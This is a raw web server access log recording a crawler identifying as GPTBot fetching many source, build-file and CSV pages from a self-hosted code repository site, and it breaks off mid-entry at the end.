"/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/logger.hpp?display=rendered" [Client 74.7.227.38] [Length 11076] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:17:45:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11001] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/controller.cpp" -[17/Feb/2026:17:45:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/logger.hpp?display=rendered" [Client 74.7.227.38] [Length 11077] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:17:45:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/logger.hpp?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:17:45:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/README.md?display=source" [Client 74.7.227.38] [Length 16016] [Gzip 4.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/README.md" -[17/Feb/2026:17:45:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:17:45:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12024] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:45:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:17:45:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12024] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12026] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11111] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:17:45:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:45:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:45:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:45:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:17:45:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 11996] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:45:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:45:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:45:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12026] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:45:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:17:45:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=.TemporaryDocument%2f%ed%95%84%ec%9a%94%20Linux%eb%aa%85%eb%a0%b9%eb%93%a4%20%eb%aa%a8%ec%9d%8c.md" [Client 74.7.227.38] [Length 25126] [Gzip 3.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:17:45:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/nos_setup.exe?display=rendered" [Client 74.7.227.38] [Length 11034] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/nos_setup.exe" -[17/Feb/2026:17:46:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/user_assets.csv?display=source" [Client 74.7.227.38] [Length 11613] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/user_assets.csv" -[17/Feb/2026:17:46:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/user_assets.csv?display=rendered" [Client 74.7.227.38] [Length 11325] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/user_assets.csv" -[17/Feb/2026:17:46:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build_exe.py?display=rendered" [Client 74.7.227.38] [Length 11107] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build_exe.py" -[17/Feb/2026:17:46:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/assets_data.csv?display=source" [Client 74.7.227.38] [Length 11622] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/assets_data.csv" -[17/Feb/2026:17:46:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__init__.py?display=rendered" [Client 74.7.227.38] [Length 11147] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__init__.py" -[17/Feb/2026:17:46:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11111] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:17:46:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/gold_price_log.csv?display=source" [Client 74.7.227.38] [Length 11460] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_price_log.csv" -[17/Feb/2026:17:46:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build_exe.py?display=source" [Client 74.7.227.38] [Length 12785] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build_exe.py" -[17/Feb/2026:17:46:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:46:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:17:46:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11747] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:17:46:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11746] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:17:46:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:17:46:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=source" [Client 74.7.227.38] [Length 16074] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:17:46:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:17:46:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11383] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:17:46:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11317] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:17:46:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=source" [Client 74.7.227.38] [Length 13194] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:17:46:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:17:46:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=source" [Client 74.7.227.38] [Length 13193] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:17:46:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11667] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:17:46:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=source" [Client 74.7.227.38] [Length 16071] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:17:46:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11668] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:17:46:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11385] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:17:46:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:17:46:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11316] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; 